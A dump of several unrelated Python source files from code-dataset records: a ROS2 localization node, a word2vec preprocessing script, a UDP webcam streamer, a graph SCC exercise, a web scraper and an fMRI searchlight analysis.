StaticTransformBroadcaster(self)\n self.tf_broadcaster = TransformBroadcaster(self)\n self.tf_buffer = Buffer()\n self.tf_listener = TransformListener(self.tf_buffer, self)\n self.map_helper = None\n self.odom_pose = None\n self.visualizer = None\n # init prediction variables\n self.odom_pose = Odometry().pose\n self.odom_pose.pose.position.x = 0.0\n self.odom_pose.pose.position.y = 0.0\n self.d_increment = self.angle_increment = 0.0\n self.odom_list = []\n # 1.76 s convolution + 4 s perception \n self.timer = self.create_timer(8.0, self.control_cycle)\n # publishers \n self.pose_publisher = self.create_publisher(PoseWithCovarianceStamped, '/markov_pose', 1)\n self.grid_publisher = self.create_publisher(OccupancyGrid,\n '/motion_update/localization_grid',\n 1)\n # subscribers\n self.create_subscription(OccupancyGrid,\n '/map',\n self.map_callback,\n qos_profile=map_qos_profile) \n \n self.tss = ApproximateTimeSynchronizer([Subscriber(self, Odometry, 'odom'),\n Subscriber(self, VisualFeatures, 'features')],\n 10,\n 6)\n self.tss.registerCallback(self.feature_callback)\n\n self.broadcast_map()\n\n def control_cycle(self):\n\n\n self.odom_list.append(self.odom_pose)\n if len(self.odom_list) > 2:\n self.odom_list.pop(0)\n\n if len(self.odom_list) < 2 or self.vqa_features is None:\n return\n self.get_logger().debug('executing algorithm')\n\n self.d_increment, self.angle_increment = self._calculate_increment(self.odom_list)\n self.localization_algorithm()\n # image = self.grid_to_img()\n # msg = self.img_to_occupancy(image)\n\n # self.grid_publisher.publish(msg)\n\n def map_callback(self, msg):\n\n self.map_helper = TopologicalMap(msg,\n self.state_qty,\n self.question_qty,\n self.question_depth)\n\n self.get_logger().info('loading topological map .. 
')\n self.get_logger().info('map folder path ' + self.map_folder)\n self.map_helper.load_map(self.map_folder)\n self.init_localization_grid()\n\n\n def grid_to_img(self):\n\n return (self._localization_grid[:, :, 0] * 255).round().astype(np.uint8)\n\n\n def broadcast_map(self):\n\n t = TransformStamped()\n\n t.header.stamp = self.get_clock().now().to_msg()\n t.header.frame_id = 'world'\n t.child_frame_id = 'map'\n\n t.transform.translation.x = 0.0\n t.transform.translation.y = 0.0\n t.transform.translation.z = 0.0\n\n t.transform.rotation.x = 0.0\n t.transform.rotation.y = 0.0\n t.transform.rotation.z = 0.0\n t.transform.rotation.w = 1.0\n\n self.tf_static_broadcaster.sendTransform(t)\n\n def img_to_occupancy(self, image):\n\n if self.map_helper is None:\n return\n\n image = image * 100\n\n map = self.map_helper.occupancy_map\n data = np.array(image.flatten(), dtype=np.int8)\n\n map.data = data.tolist()\n\n return map\n\n\n def feature_callback(self, odom_msg, vqa_msg):\n\n if self.map_helper is None:\n return\n \n self.vqa_features = vqa_msg\n self.odom_pose = odom_msg.pose\n\n return True\n\n def init_localization_grid(self):\n\n self._localization_grid = np.full(\n shape=(self.map_helper.occupancy_map.info.height,\n self.map_helper.occupancy_map.info.width,\n self.state_qty+1),\n fill_value=1/((self.state_qty+1)*self.map_helper.occupancy_map.info.height*\n self.map_helper.occupancy_map.info.width))\n\n # 116,192 center coordinates\n # self._localization_grid[105:125,180:200,0] = 0.45\n self.get_logger().info(\"grid initialized\")\n\n return True\n\n def convolve_1d(self, kernel_1d):\n \n _ = np.apply_along_axis(lambda m: np.convolve(m, kernel_1d, mode=\"same\"), axis=-1, arr=self._localization_grid[:,:,1:])\n self._localization_grid[:,:,1:] = _\n\n return True\n \n def _calculate_1d_kernel_size(self):\n\n size = int(np.round(self.state_qty / self.kernel_scale))\n \n return size\n\n def _calculate_1d_kernel_center(self,odom_pose,kernel_shape,is_centered=False):\n\n kernel_resolution = 2*np.pi / kernel_shape #rad/div\n angle = self.map_helper._quaternion_to_euler(odom_pose.pose.orientation)[-1]\n if angle < 0:\n angle = angle + 2*np.pi\n elif angle > 2 * np.pi:\n angle = 2 * np.pi\n if is_centered:\n center = int(np.round(kernel_shape/2))\n else: \n center = int(np.round(angle/kernel_resolution))\n\n return center\n \n def _calculate_2d_kernel_size(self):\n\n height = int(self.map_helper.occupancy_map.info.height / self.kernel_scale)\n width = int(self.map_helper.occupancy_map.info.width / self.kernel_scale) \n \n return (height, width)\n\n def _calculate_2d_kernel_center(self, odom_pose, kernel_shape, is_centered=False):\n\n kernel_resolution = ((self.map_helper.occupancy_map.info.height * self.map_resolution / kernel_shape[0]) +\n (self.map_helper.occupancy_map.info.width * self.map_resolution / kernel_shape[1]))/2\n \n\n if is_centered: \n h = int(kernel_shape[0]/2)\n w = int(kernel_shape[1]/2)\n else: \n h = int(round((odom_pose.pose.position.y - self.map_helper.occupancy_map.info.origin.position.y ) / kernel_resolution))\n w = int(round((odom_pose.pose.position.x - self.map_helper.occupancy_map.info.origin.position.x ) / kernel_resolution))\n \n return (h, w)\n\n def _calculate_sigma(self):\n return\n\n def _1d_gaussian_kernel(self, k_size=5, sigma=1.0, center=2):\n\n x = np.arange(k_size)\n \n kernel = (1 / (np.sqrt(2 * np.pi) * sigma)) * np.exp(-((x - center) ** 2 / (2 * sigma ** 2)))\n \n kernel = kernel / np.sum(kernel) \n\n return kernel\n \n def _2d_gaussian_kernel(self, 
k_size=(10, 10), sig=[1, 1], center=(2, 2)):\n # Define the kernel size\n n_h, n_w = k_size\n\n # Define the standard deviation of the Gaussian distribution for each axis\n sigma_h, sigma_w = sig\n\n # Define the center of the kernel\n center_h, center_w = center\n\n # Create 2D coordinate arrays for the kernel using np.mgrid\n y, x = np.mgrid[:n_h, :n_w]\n\n # Calculate the values of the Gaussian distribution at each element of the kernel\n kernel = (1 / (np.sqrt(2 * np.pi) * sigma_h * sigma_w)) * np.exp(-(((x - center_w) ** 2 / (2 * sigma_w ** 2)) + ((y - center_h) ** 2 / (2 * sigma_h ** 2))))\n\n # Normalize the kernel so that the values sum to 1\n kernel = kernel / np.sum(kernel)\n\n return kernel\n\n def motion_update(self, delta_distance, delta_theta):\n\n self.get_logger().debug(f'delta distance{delta_distance}') \n if delta_distance <= 0.1:\n centered_2d = True\n else:\n centered_2d = False\n if delta_theta <= 0.0872665:\n centered_1d = True\n else:\n centered_1d = False\n\n kernel_shape_2d = self._calculate_2d_kernel_size()\n kernel_shape_1d = self._calculate_1d_kernel_size()\n\n center_2d = self._calculate_2d_kernel_center(self.odom_pose, kernel_shape_2d, is_centered=centered_2d)\n center_1d = self._calculate_1d_kernel_center(self.odom_pose, kernel_shape_1d, is_centered=centered_1d)\n\n gauss_kernel_2d = self._2d_gaussian_kernel(kernel_shape_2d, center=center_2d)\n gauss_kernel_1d = self._1d_gaussian_kernel(kernel_shape_1d, center=center_1d)\n\n self._localization_grid[:, :, 0] = signal.fftconvolve(self._localization_grid[:, :, 0], gauss_kernel_2d, mode='same')\n self.convolve_1d(gauss_kernel_1d)\n self.get_logger().debug(f\"center 2d {center_2d}\")\n\n return True\n\n def normalize_grid(self):\n\n self._localization_grid = self._localization_grid / self._localization_grid.max()\n \n def perception_update(self):\n\n # question_answers_indexes = []\n # question_answers_accs = []\n\n # for i in range(len(self.vqa_features.data)):\n\n # # 'refrigerator' \n # ind = np.where(self.map_helper.topological_map['q_a'] == self.vqa_features.data[i])\n # # we keep only coincidences in the current question \n # ind = ind[0][np.where(ind[1] == i)]\n \n # # we keep the topological indexes where there is a coincidence :\n # current_question_indexes = self.map_helper.topological_map['index'][np.unique(ind)] \n # current_question_acc = []\n \n # # we extract the accuracy for each one of them (acc of question times acc of map) \n # for index in np.unique(ind):\n # acc_ind = np.where(self.map_helper.topological_map['q_a'][index][i] == self.vqa_features.data[i]) \n # acc = acc_ind[0].size / np.nonzero(self.map_helper.topological_map['q_a'][index][i])[0].size \n # current_question_acc.append(acc)\n\n # question_answers_indexes.extend(current_question_indexes.tolist())\n # question_answers_accs.extend(current_question_acc)\n\n \n # current_map_raw = np.transpose(np.array([question_answers_indexes,question_answers_accs]))\n \n # # there are repeated indexes\n # unique_elements, counts = np.unique(current_map_raw[:, 0], return_counts=True)\n\n\n\n\n # # Iterate over the unique elements\n # for i in unique_elements:\n\n # indices = np.where(current_map_raw[:, 0] == i)\n # values = current_map_raw[indices][:, 1]\n # product = np.prod(values)\n \n # col,row,state = self.map_helper.topological_index_to_occupancy_x_y(int(i))\n # self._localization_grid[row,col,0] *= (1/product)\n # self._localization_grid[row,col,state] *= (1/product) \n\n question_answers_indexes = []\n question_answers_accs = []\n\n for i in 
range(len(self.vqa_features.data)):\n\n ind = np.where(self.map_helper.topological_map['q_a'] == self.vqa_features.data[i])\n # we keep only coincidences in the current question \n ind = ind[0][np.where(ind[1] == i)]\n \n # we keep the topological indexes where there is a coincidence :\n current_question_indexes = self.map_helper.topological_map['index'][np.unique(ind)] \n current_question_acc = []\n \n # we extract the accuracy for each one of them (acc of question times acc of map) \n for index in np.unique(ind):\n acc_ind = np.where(self.map_helper.topological_map['q_a'][index][i] == self.vqa_features.data[i]) \n acc = acc_ind[0].size / np.nonzero(self.map_helper.topological_map['q_a'][index][i])[0].size \n current_question_acc.append(acc)\n\n question_answers_indexes.extend(current_question_indexes.tolist())\n question_answers_accs.extend(current_question_acc)\n \n current_map_raw = np.transpose(np.array([question_answers_indexes,question_answers_accs]))\n \n # there are repeated indexes\n unique_elements, counts = np.unique(current_map_raw[:, 0], return_counts=True)\n\n # Iterate over the unique elements\n for i in unique_elements:\n\n indices = np.where(current_map_raw[:, 0] == i)\n values = current_map_raw[indices][:, 1]\n product = np.prod(values)\n \n col,row,state = self.map_helper.topological_index_to_occupancy_x_y(int(i))\n # change to sum\n self._localization_grid[row,col,0] += (1/product)\n self._localization_grid[row,col,state] += (1/product) \n\n self.normalize_grid()\n\n return True\n \n\n def publish_pose(self,covariance=1.0):\n \n ind = np.unravel_index(np.argmax(self._localization_grid, axis=None), self._localization_grid.shape)\n x, y = self.map_helper._get_world_x_y(ind[1], ind[0])\n theta = self.map_helper._undiscretize_angle(ind[2])\n \n msg = PoseWithCovarianceStamped()\n msg.header.frame_id = 'map'\n msg.header.stamp = self.get_clock().now().to_msg()\n\n msg.pose.pose.position.x = x\n msg.pose.pose.position.y = y\n msg.pose.pose.position.z = 0.0\n\n q = self.map_helper._quaternion_from_euler(0.0, 0.0, theta)\n msg.pose.pose.orientation.x = q[0]\n msg.pose.pose.orientation.y = q[1]\n msg.pose.pose.orientation.z = q[2]\n msg.pose.pose.orientation.w = q[3]\n\n self.pose_publisher.publish(msg)\n \n return True\n\n def _calculate_increment(self,msg_buffer):\n\n initial_distance = math.sqrt(msg_buffer[0].pose.position.x ** 2 + \n msg_buffer[0].pose.position.y ** 2 +\n msg_buffer[0].pose.position.z ** 2)\n\n current_distance = math.sqrt(msg_buffer[1].pose.position.x ** 2 + \n msg_buffer[1].pose.position.y ** 2 +\n msg_buffer[1].pose.position.z ** 2)\n\n initial_angle = self.map_helper._quaternion_to_euler(msg_buffer[0].pose.orientation)[-1]\n current_angle = self.map_helper._quaternion_to_euler(msg_buffer[1].pose.orientation)[-1]\n \n distance_increment = abs(current_distance - initial_distance)\n angle_increment = abs(current_angle - initial_angle)\n\n return distance_increment, angle_increment\n\n def localization_algorithm(self):\n\n self.perception_update()\n self.motion_update(self.d_increment, self.angle_increment)\n\n self.publish_pose()\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n topo_node = TopologicalLocalization()\n\n rclpy.spin(topo_node)\n\n\n topo_node.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n 
main()\n\n","repo_name":"juandpenan/topology_nav_ros2","sub_path":"topological_localization/topological_localization/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41738315662","text":"import gzip\nimport multiprocessing\nimport re\nimport sys\nfrom argparse import ArgumentParser\nfrom math import floor\nfrom os import listdir, makedirs, path\nfrom shutil import copyfile\n\nimport numpy as np\nimport pandas as pd\nimport spacy\nfrom gensim.models import Word2Vec\nfrom spacy_langdetect import LanguageDetector\nfrom yaspin import yaspin\n\nfrom visualize_embeddings import tsne_plot\n\nORTH = spacy.symbols.ORTH\n\n\ndef round_down(num):\n i = str(num)\n divisor_max = 2 if num < 1000 else 3\n divisor_idx = min(len(i), divisor_max)\n\n divisor = \"\".join(i[:divisor_idx])\n\n for i in range(len(divisor), len(i)):\n divisor = divisor + \"0\"\n\n divisor = int(divisor)\n\n return floor(num / divisor) * divisor\n\n\ndef splitForwardSlashes(match):\n slashes = list(match.group(0))\n return \" \".join(slashes)\n\n\ndef clean_token(text):\n # normalize\n text = text.lower()\n\n # replace URLs\n text = re.sub(r\"(https|http)?:\\/\\/(\\w|\\.|\\/|\\?|\\=|\\&|\\%)*\\b\", \"URL\", text)\n\n # custom splitting rule to create space around special code characters\n text = re.sub(r\"([.,()<>\\[\\]{}\\\"\\'`\\-$=_;%|&#~^\\\\])\", r\" \\1 \", text)\n\n # replace multiple forward slashes\n text = re.sub(r\"\\/{3,}\", lambda m: splitForwardSlashes(m), text)\n\n # replace tab stops\n text = re.sub(r\"\\t\", \"\", text)\n\n # replace newlines with a special \"end-of-sequence\" token\n text = re.sub(r\"\\r\\n|\\r|\\n\", \" \", text)\n\n return text\n\n\ndef clean_document(doc):\n \"\"\" Clean up comments. 
Tokenize, lowercase, and remove characters that are not allowed \"\"\"\n\n # filter out English comments\n isEnglish = lambda doc: doc._.language[\"language\"] == \"en\"\n\n if not isEnglish(doc):\n return nlp.make_doc(\"\")\n\n # clean each token in document\n text = [token for token in (clean_token(tok.text) for tok in doc) if token != \"\"]\n\n text = \" \".join(text)\n\n # adding a start and an end token to the sentence so that\n # the model know when to start and stop predicting\n text = \" \" + text + \" \"\n\n # replace multiple whitespaces with a single whitespace\n text = re.sub(r\" {2,}\", \" \", text)\n\n return nlp.make_doc(text)\n\n\nnlp = spacy.load(\"en_core_web_sm\")\n\n# add special cases for the tokenizer\nnlp.tokenizer.add_special_case(\"/**\", [{ORTH: \"/**\"}])\nnlp.tokenizer.add_special_case(\"/*\", [{ORTH: \"/*\"}])\nnlp.tokenizer.add_special_case(\"*/\", [{ORTH: \"*/\"}])\nnlp.tokenizer.add_special_case(\"//\", [{ORTH: \"//\"}])\nnlp.tokenizer.add_special_case(\"\", [{ORTH: \"\"}])\nnlp.tokenizer.add_special_case(\"\", [{ORTH: \"\"}])\nnlp.tokenizer.add_special_case(\"\", [{ORTH: \"\"}])\n\nnlp.add_pipe(clean_document, name=\"cleaner\", last=True)\nnlp.add_pipe(LanguageDetector(), name=\"language_detector\", before=\"cleaner\")\n\nboolean = lambda x: (str(x).lower() == \"true\")\n\nparser = ArgumentParser()\n\nparser.add_argument(\n \"-v\", \"--visualize\", nargs=\"?\", type=boolean, const=True, default=False\n)\n\nparser.add_argument(\n \"-s\", \"--save-dataset\", nargs=\"?\", type=boolean, const=True, default=True\n)\n\nparser.add_argument(\"-t\", \"--train\", nargs=\"?\", type=boolean, const=True, default=False)\n\nparser.add_argument(\n \"-d\", \"--dataset\", nargs=\"?\", type=str, const=True, default=\"dataset.json\"\n)\n\nargs = parser.parse_args()\n\nsaveDataset = args.save_dataset\nvisualize = args.visualize\ntrain = args.train\n\ndata_dir = \"../data\"\nmetadata_filename = \"metadata.txt\"\nmetadata_path = path.join(data_dir, metadata_filename)\ndataset_path = path.join(data_dir, args.dataset)\nfilename_dataset_clean = \"dataset_clean.csv\"\n\nif not path.exists(dataset_path):\n sys.exit(\n \"Error: Couldn't find '{}'. Make sure to generate a dataset first.\".format(\n path.basename(dataset_path)\n )\n )\n\nout_dir = \"../runs\"\n\n# create output dir\nif not path.exists(out_dir):\n makedirs(out_dir)\n\ndf = pd.read_json(dataset_path, lines=True)\n\n# create run dir\nrun_dir = \"\"\n\n# --- Hyper-Parameters ---\n\n# more dimensions mean more computationally expensive,\n# but also more accurate. 
300 is a decent compromise\nnum_features = 300\n\n# minimum count of words to consider when training the model\nmin_word_count = 3\n\n# run training in parallel, more workers = faster training\nnum_workers = multiprocessing.cpu_count()\n\n# size of the sliding window (number of words around the target window)\nwindow_size = 7\n\n# determines how often do we want to look at the same word\ndownsampling = 1e-3\n\n# used to pick what part of the text we look at\nseed = 1\n\n# default is 5, we keep the default because increasing the number\n# of epochs dramatically increases the training time, but also gives\n# better results.\nepochs = 5\n\n# ------------------------\n\n\n@yaspin(text=\"Cleaning comments...\")\ndef clean_comments(comments):\n comments = comments.apply(lambda c: nlp(c))\n comments = comments.apply(lambda doc: doc if doc.text != \"\" else np.nan)\n return comments\n\n\n@yaspin(text=\"Dumping dataset...\")\ndef dump_dataset(df):\n df.to_csv(path.join(run_dir, filename_dataset_clean), header=True)\n\n\n@yaspin(text=\"Training Word2vec...\")\ndef train_word2vec(\n sentences,\n sg=1,\n size=num_features,\n min_count=min_word_count,\n seed=seed,\n window=window_size,\n sample=downsampling,\n iter=epochs,\n):\n model = Word2Vec(\n sentences,\n sg=sg,\n size=size,\n min_count=min_count,\n seed=seed,\n window=window,\n workers=num_workers,\n sample=sample,\n iter=iter,\n )\n\n return model\n\n\n@yaspin(text=\"Saving model...\")\ndef save_model(model, filename):\n model_path = path.join(run_dir, filename)\n model.save(model_path)\n\n\n@yaspin(text=\"Plotting word embeddings...\")\ndef plot_embeddings(model, df, filename):\n tsne_plot(model, df, filename)\n\ndf[\"comments_orig\"] = df[\"comments\"]\ndf[\"comments\"] = clean_comments(df[\"comments\"])\n\n# remove corrupted rows (mostly comments that are written in languages other than English)\ndf = df.dropna()\n\nn_observations = df.shape[0]\nn_observations_r = round_down(n_observations)\n\nrun_dir = path.join(out_dir, str(n_observations_r))\n\nif not path.exists(run_dir):\n makedirs(run_dir)\n\nprint(\"Observations: {}\".format(n_observations))\n\ncomments = df[\"comments\"].map(lambda doc: [token.text for token in doc])\n\nif train:\n model_comments = train_word2vec(comments)\n save_model(model_comments, \"word2vec_comments.model\")\n print(\"Size Vocabulary (Comments):\", len(model_comments.wv.vocab))\n\n if visualize:\n plot_embeddings(model_comments, df, path.join(run_dir, \"word2vec_comments.png\"))\n\nasts = df[\"ast\"]\nasts = asts.map(lambda ast: [token for token in ast.split(\" \")])\n\nif train:\n model_asts = train_word2vec(asts, min_count=1)\n save_model(model_asts, \"word2vec_asts.model\")\n print(\"Size Vocabulary (ASTs):\", len(model_asts.wv.vocab))\n\n if visualize:\n plot_embeddings(model_asts, df, path.join(run_dir, \"word2vec_asts.png\"))\n\ndataset_clean = df[[\"ast\", \"comments\", \"comments_orig\"]]\n\nif saveDataset:\n dump_dataset(dataset_clean)\n\nprint(\"Copying metadata\")\ncopyfile(metadata_path, path.join(run_dir, metadata_filename))\n\nprint(\"Done!\")\n","repo_name":"urish/ml-comments-gen","sub_path":"model/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":7090,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"71504760489","text":"import time\n\nimport cv2,socket,pickle,os\nimport numpy as np\nimport threading\n\nclass VideoStream:\n def __init__(self):\n self.cap = None\n self.s = socket.socket(socket.AF_INET, 
socket.SOCK_DGRAM)\n self.s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1000000)\n self.user_sockets = []\n self.current_thread = None\n self.is_streaming = False\n\n def add_user(self, u_ip: str, u_port: int):\n self.user_sockets.append((u_ip, u_port))\n\n def remove_user(self, u_ip: str, u_port: int):\n t = (u_ip, u_port)\n self.user_sockets.remove(t)\n self.stop_streaming()\n\n def video_streaming(self):\n print(\"Streaming!\")\n self.is_streaming = True\n # self.cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)\n self.cap = cv2.VideoCapture(0)\n while self.is_streaming:\n ret, photo = self.cap.read()\n\n if photo is None:\n continue\n ret, buffer = cv2.imencode(\".jpg\", photo, [int(cv2.IMWRITE_JPEG_QUALITY), 30])\n x_as_bytes = pickle.dumps(buffer)\n for u_ip, u_port in self.user_sockets:\n self.s.sendto((x_as_bytes), (u_ip, u_port))\n\n def start_stream(self, u_ip: str, u_port: int):\n if not self.user_sockets:\n self.current_thread = threading.Thread(target=self.video_streaming)\n self.current_thread.start()\n\n self.add_user(u_ip, u_port)\n\n def stop_streaming(self, force=False):\n time.sleep(0.1)\n if force or not self.user_sockets:\n self.is_streaming = False\n self.cap.release()\n print(\"stopped streaming from class\")\n\n\n\n\n","repo_name":"DoronMaor/MyGardenGenie","sub_path":"trash/VideoStreaming/VideoStream.py","file_name":"VideoStream.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27685599634","text":"###################################\r\n#\t\t\t\t\t\t\t\t #\r\n#\t\tAuthor : Dhananjay\t\t #\r\n#\t\t\t\t IIT Gandhinagar #\r\n#\t\t\t\t\t\t\t\t #\r\n###################################\r\n\r\n# Finding strongly connected components(SSC) in directed graph\r\n# Extension of dfs \t\t\t\t\t - \t\tO(V+E)\r\n\r\nfrom collections import defaultdict\r\nUNVISITED = 0\r\nEXPLORED = 1\r\nVISITED = 2\r\n\r\ndef SSC(u):\r\n\tglobal dfsNumber, sscNumber\r\n\tdfs_low[u] = dfs_num[u] = dfsNumber\r\n\tdfsNumber += 1\r\n\tvisited[u] = VISITED\r\n\tstc.append(u)\r\n\t\r\n\tfor v,w in AdjList[u]:\r\n\t\tif dfs_num[v] == UNVISITED:\r\n\t\t\tSSC(v)\r\n\t\tif visited[v]:\r\n\t\t\tdfs_low[u] = min(dfs_low[u], dfs_low[v])\r\n\t\r\n\tif dfs_low[u] == dfs_num[u]:\r\n\t\tsscNumber += 1 \r\n\t\tprint(\"SSC\", sscNumber,\":\", end = \" \")\r\n\t\twhile True:\r\n\t\t\tv = stc.pop()\r\n\t\t\tvisited[v] = UNVISITED\r\n\t\t\tprint(v, end = \" \")\r\n\t\t\tif u == v:\r\n\t\t\t\tbreak\r\n\t\tprint()\r\n\r\n\r\nAdjList = defaultdict(list)\r\n# Graph for which we will create AdjList.\r\n#\r\n# 7 5 9 1\r\n#\t0 ------> 1 ---> 2 ------> 4 ---> 5\r\n#\t\t ^ /\t\t ^ |\r\n#\t\t 8| / 5\t 5|\t | 3\r\n#\t\t | /\t\t |\t |\r\n# |v \t | 3 v \r\n# 3 \t 6 <--- 7\r\nAdjList = {0 : [[1,7]],\r\n\t\t 1 : [[2,5]],\r\n\t\t 2 : [[3,5],[4,9]],\r\n\t\t 3 : [[1,8]],\r\n\t\t 4 : [[5,1]],\r\n\t\t 5 : [[7,3]],\r\n\t\t 6 : [[4,5]],\r\n\t\t 7 : [[6,3]]}\r\nV = len(AdjList)\r\ndfs_num = [UNVISITED]*V\r\ndfs_low = [UNVISITED]*V\r\nvisited = [UNVISITED]*V\r\nstc = []\r\ndfsNumber = 0\r\nsscNumber = 0\r\n\r\nfor i in range(V):\r\n\tif dfs_num[i] == UNVISITED:\r\n\t\tSSC(i)\r\n","repo_name":"dhananjay1210/Data-Structures","sub_path":"graph/8.graph_SSC.py","file_name":"8.graph_SSC.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30257054138","text":"import requests\nfrom bs4 import BeautifulSoup\n\nheaders = {'User-Agent': 'Mozilla/5.0 
(Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n\ndef get_pages(idx):\n url = \"https://editorial.rottentomatoes.com/publications\"\n response = requests.get(url, params = {'wpv_view_count': '52769-TCPID52767', 'wpv_paged': idx}, headers = headers)\n html = response.text\n soup = BeautifulSoup(html, \"html.parser\")\n\n headlines = soup.select('a.article_headline')\n publishers = soup.select('a.unstyled.bold')\n date = soup.select('.subtle.small')\n\n output_hl = []\n output_pub = []\n output_date = []\n\n # for title in headlines:\n # output.append(title.text.strip())\n\n # print(len(headlines))\n # print(len(publishers))\n # print(len(date))\n\n for i in range(0, len(headlines)):\n output_hl.append(headlines[i].text.strip())\n output_pub.append(publishers[i].text.strip())\n output_date.append(date[i].text.strip())\n\n return output_hl, output_pub, output_date\n\nfor j in range(1,100):\n result_hl, result_pub, result_date = get_pages(j)\n for i in range(0,len(result_hl)):\n print(result_hl[i])\n print(result_pub[i])\n print(result_date[i])\n","repo_name":"pondjames007/DetourningTheWeb","sub_path":"hw2_grabLongList/hw2.py","file_name":"hw2.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25292683241","text":"import os\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport nibabel as nib\n\nfrom fg_config import *\nfrom bids_model import bids_events\n\nfrom nilearn.input_data import NiftiMasker\nfrom nilearn.image import new_img_like\nfrom collections import OrderedDict\nfrom scipy.stats import ttest_1samp, ttest_ind, wilcoxon\n\nconditions = {'CS+': 'CSp',\n 'CS-': 'CSm'}\nphases = ['acquisition','extinction']\n\nmasker = NiftiMasker(mask_img=std_2009_brain_mask_3mm)\nmasker.fit()\n\n\ndef sub_imgs():\n\n std = nib.load(std_2009_brain_mask_3mm)\n for sub in all_sub_args:\n print(sub)\n subj = bids_meta(sub)\n out = f'{subj.rsa}/ers_sl_imgs'\n mkdir(out)\n\n with open(os.path.join(subj.rsa,'sl_er.p'),'rb') as file:\n mat = pickle.load(file)\n mat = new_img_like(std_2009_brain_3mm,mat)#need this for the inverse to work\n mat = masker.transform(mat)\n\n df = pd.read_csv(os.path.join(subj.rsa,'fs_mask_roi_ER.csv'))\n df = df[df.roi == 'sgACC'].reset_index(\n ).rename(columns={'index':'trial_num'}\n ).drop(columns=['roi','rsa']\n ).set_index(['encode_phase','trial_type']\n ).sort_index(\n ).dropna(subset=['response'])#sets us up to use .loc for stability\n\n for phase in phases:\n for con in conditions:\n est = mat[df.loc[(phase,con),'trial_num'].values,:].mean(axis=0)\n est = new_img_like(std,masker.inverse_transform(est).get_fdata(),copy_header=True)#need this for the header\n nib.save(est,f'{out}/{phase}_{conditions[con]}.nii.gz')\n\n #lets also do the subtraction i guess\n for phase in phases:\n csp = mat[df.loc[(phase,'CS+'),'trial_num'].values,:].mean(axis=0)\n csm = mat[df.loc[(phase,'CS-'),'trial_num'].values,:].mean(axis=0)\n est = csp - csm\n est = new_img_like(std,masker.inverse_transform(est).get_fdata(),copy_header=True)#need this for the header\n nib.save(est,f'{out}/{phase}_diff.nii.gz')\n\ndef one_samp_ttest(subs=None,phase=None,name=''):\n out_parent = '/scratch/05426/ach3377/searchlight/ers_comps'\n out_dir = f'/scratch/05426/ach3377/searchlight/ers_comps/{name}_{phase}'\n mkdir(out_dir)\n \n setA = ''\n for s, sub in enumerate(subs):\n setA += f'{bids_meta(sub).rsa}/ers_sl_imgs/{phase}_diff.nii.gz 
'\n \n n_cors = 'export OMP_NUM_THREADS=48'\n cd_cmd = f'cd {out_dir}'\n clustsim_cmd = f'3dttest++ -setA {setA} \\\n -Clustsim 48 \\\n -mask {gm_3mm_thr} \\\n -prefix {name}_{phase}_clst-ttest'\n \n script = f'{out_dir}/ttest_script.txt'\n os.system(f'rm {script}')\n \n for cmd in [n_cors, cd_cmd, clustsim_cmd]:\n os.system(f\"echo {cmd} >> {script}\")\n \n jobfile = f'/home1/05426/ach3377/gPPI/jobs/{name}_sl_ers_job.txt'\n os.system(f'rm {jobfile}')\n\n #not run here, just submiting a job\n os.system(f'echo singularity run --cleanenv \\\n /scratch/05426/ach3377/bids-apps/neurosft.simg \\\n bash -x {script} >> {jobfile}')\n\n os.system(f'launch -N 1 \\\n -n 1 \\\n -J 3dttest++ \\\n -s {jobfile} \\\n -m achennings@utexas.edu \\\n -p normal \\\n -r 0:05:00 \\\n -A LewPea_MRI_Analysis')\none_samp_ttest(subs=sub_args,phase='acquisition',name='healthy')\none_samp_ttest(subs=sub_args,phase='extinction',name='healthy')\none_samp_ttest(subs=p_sub_args,phase='acquisition',name='ptsd')\none_samp_ttest(subs=p_sub_args,phase='extinction',name='ptsd')\n\ndef paired_ttest(subs=None,name=''):\n out_parent = '/scratch/05426/ach3377/searchlight/ers_comps'\n out_dir = f'/scratch/05426/ach3377/searchlight/ers_comps/{name}'\n mkdir(out_dir)\n \n setA = ''\n setB = ''\n for s, sub in enumerate(subs):\n subj = bids_meta(sub)\n setA += f'{subj.rsa}/ers_sl_imgs/extinction_diff.nii.gz '\n setB += f'{subj.rsa}/ers_sl_imgs/acquisition_diff.nii.gz '\n\n n_cors = 'export OMP_NUM_THREADS=48'\n cd_cmd = f'cd {out_dir}'\n clustsim_cmd = f'3dttest++ -setA {setA} \\\n -setB {setB} \\\n -AminusB \\\n -paired \\\n -Clustsim 48 \\\n -mask {gm_3mm_thr} \\\n -prefix {name}_clst-ttest'\n \n script = f'{out_dir}/ttest_script.txt'\n os.system(f'rm {script}')\n \n for cmd in [n_cors, cd_cmd, clustsim_cmd]:\n os.system(f\"echo {cmd} >> {script}\")\n \n #run it\n os.system(f'singularity run --cleanenv \\\n /scratch/05426/ach3377/bids-apps/neurosft.simg \\\n bash -x {script}')\npaired_ttest(subs=sub_args,name='healthy_phase_diff')\npaired_ttest(subs=p_sub_args,name='ptsd_phase_diff')\n\ndef ind_ttest(phase=None,name=''):\n out_parent = '/scratch/05426/ach3377/searchlight/ers_comps'\n out_dir = f'/scratch/05426/ach3377/searchlight/ers_comps/{name}'\n mkdir(out_dir)\n \n setA = ''\n setB = ''\n for sub in sub_args:\n subj = bids_meta(sub)\n setA += f'{subj.rsa}/ers_sl_imgs/{phase}_diff.nii.gz '\n \n for sub in p_sub_args:\n subj = bids_meta(sub)\n setB += f'{subj.rsa}/ers_sl_imgs/{phase}_diff.nii.gz '\n \n n_cors = 'export OMP_NUM_THREADS=48'\n cd_cmd = 